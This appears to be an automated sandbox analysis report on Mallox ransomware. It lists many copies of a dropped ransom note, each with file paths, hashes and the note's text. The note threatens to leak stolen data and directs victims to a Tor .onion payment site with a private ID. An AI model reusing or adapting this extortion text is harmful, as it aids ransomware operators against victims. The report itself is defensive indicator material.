                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\AppCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\AppCache\VK9F5UCX\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\1JB42J3T\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\9STK1G5A\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\CBWFFYXX\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\WFOHHXT6\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCookies\ESE\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetHistory\History.IE5\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\Content\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\MetaData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\Microsoft\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
